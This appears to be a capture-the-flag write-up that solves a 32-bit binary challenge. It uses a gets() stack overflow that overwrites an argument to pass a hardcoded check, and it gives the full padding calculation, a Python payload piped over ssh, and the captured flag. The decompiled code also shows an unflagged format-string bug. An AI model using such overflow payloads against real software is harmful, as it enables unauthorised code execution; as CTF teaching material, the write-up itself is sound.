We are given a binary and a key.
$ file e100.bin
e100.bin: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=4410355efef2e99ac54e4028dba1b3e40d055fee, strippedAlso loading in gdb-peda.
gdb-peda$ checksec
CANARY : ENABLED
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : PartialGood. Loading the binary in Hopper and decompiling.
function sub_80484fd {
var_C = *0x14;
printf("Enter password: ");
gets(var_2C);
if (arg0 == 0xbadb0169) {
system("cat flag");
}
else {
for (var_30 = 0x0; var_30 < strlen(var_2C); var_30 = var_30 + 0x1) {
*(int8_t *)(var_30 + var_2C) = arg0 ^ *(int8_t *)(var_30 + var_2C) & 0xff;
}
printf("Your new secure password is: ");
printf(var_2C);
}
eax = var_C ^ *0x14;
COND = eax == 0x0;
if (!COND) {
eax = __stack_chk_fail();
}
return eax;
}So a gets and a static hardcoded check. Basic buffer overflow!!
0x804851b: lea eax,[ebp-0x2c]
0x804851e: mov DWORD PTR [esp],eax
=> 0x8048521: call 0x80483a0 <gets@plt>
0x8048526: cmp DWORD PTR [ebp+0x8],0xbadb0169This gives us padding = 0x2c+0x8 = 52 Now the final blow.
$ python -c "print 'A'*52+'\xba\xdb\x01\x69'[::-1]" | ssh -i id_rsa_e100 dctf@10.13.37.6
Pseudo-terminal will not be allocated because stdin is not a terminal.
DCTF{3671bacdb5ea5bc26982df7da6de196e}
Enter password: *** stack smashing detected ***: /home/dctf/e100 terminatedFlag:
DCTF{3671bacdb5ea5bc26982df7da6de196e}